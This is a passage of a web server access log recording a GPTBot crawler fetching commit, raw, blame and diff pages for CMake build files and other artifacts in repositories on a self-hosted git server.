(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14725] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:14:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:14:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:14:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:14:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10661] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31148] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13476] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18934] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11404] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:14:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:14:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:14:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:14:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 51955] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:14:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 239338] [Gzip 15.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 387780] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:14:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 212460] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:14:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 16190] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 57175] [Gzip 11.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-all" 